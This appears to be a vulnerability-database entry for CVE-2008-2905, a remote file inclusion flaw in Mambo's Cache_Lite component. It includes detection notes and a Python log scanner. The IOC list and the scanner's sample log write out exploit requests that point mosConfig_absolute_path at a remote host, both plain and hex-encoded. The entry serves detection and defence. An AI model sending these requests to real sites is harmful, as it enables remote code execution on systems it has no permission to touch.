CVE-2008-2905
published 2008-06-30


Priority: P3 (47)
CVSS 2.0: 6.8 (medium), vector AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: available
EPSS: 18.40% (96.9th percentile)
PHP remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo 4.6.4 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.

Affected

23 ranges

Vendor / Product / Version range / Fixed in: all 23 ranges list vendor mambo, product mambo; no version range or fixed-in values are given for them.

Detection & IOCs (extracted from sources)

path: /includes/Cache/Lite/Output.php
url: /includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell?
command: GET /includes/Cache/Lite/Output.php?mosConfig_absolute_path=!URL!
  • Monitor HTTP requests targeting the path /includes/Cache/Lite/Output.php with a URL-valued mosConfig_absolute_path parameter, which is the injection point for this RFI vulnerability.
  • Alert on GET requests where the mosConfig_absolute_path query parameter contains an external URL (http:// or https://) — this is the canonical exploitation pattern for this RFI.
  • The Metasploit module hex-encodes the remote payload URL using Rex::Text.to_hex with '%' prefix before injecting it into mosConfig_absolute_path; detection rules should account for percent-encoded URLs in this parameter.
  • The vulnerable code path is the require_once call in Output.php that directly incorporates the unvalidated mosConfig_absolute_path value; file integrity monitoring on this file can help detect tampering.
  • The vulnerability is only exploitable when PHP's register_globals directive is enabled; systems with register_globals disabled are not affected.
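As an added defensive example (not code from this page, from Mambo, or from the Metasploit module), the following Python scanner applies the detection notes above to combined-format web access log lines: it matches the Output.php path, parses the mosConfig_absolute_path parameter, and percent-decodes the value so the hex-encoded form described above is caught as well. The log lines, timestamps and TEST-NET addresses are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Injection point named in the CVE-2008-2905 description and detection notes.
TARGET_PATH = "/includes/Cache/Lite/Output.php"
PARAM = "mosConfig_absolute_path"
EXTERNAL_SCHEMES = ("http://", "https://")

# Common/combined access log format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def check_request(target):
    """Return a finding dict if the request target carries an external URL in
    mosConfig_absolute_path against Output.php, otherwise None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(TARGET_PATH.lower()):
        return None
    # parse_qs decodes one layer of %XX (the '%'-prefixed hex form); the extra
    # unquote() catches values that were percent-encoded twice.
    for raw in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        value = unquote(raw).strip()
        if value.lower().startswith(EXTERNAL_SCHEMES):
            return {"path": parts.path, "param": PARAM, "value": value}
    return None

def scan_log(lines):
    """Run check_request over access log lines; return the list of findings."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = check_request(m.group("target"))
        if hit:
            hit.update(client=m.group("client"), status=m.group("status"))
            findings.append(hit)
    return findings

# Constructed sample log (TEST-NET addresses); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Jun/2008:10:01:02 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120
203.0.113.9 - - [30/Jun/2008:10:01:05 +0000] "GET /includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://198.51.100.20/x.txt? HTTP/1.1" 200 312
203.0.113.9 - - [30/Jun/2008:10:01:07 +0000] "GET /includes/Cache/Lite/Output.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2f198.51.100.20%2fx.txt HTTP/1.1" 200 312
203.0.113.11 - - [30/Jun/2008:10:02:00 +0000] "GET /includes/Cache/Lite/Output.php?mosConfig_absolute_path=/var/www/mambo HTTP/1.1" 200 0
"""
```

The fourth sample line carries a local filesystem path in the parameter and produces no finding, which keeps ordinary register_globals-style traffic out of the alert stream; only URL-valued parameters match.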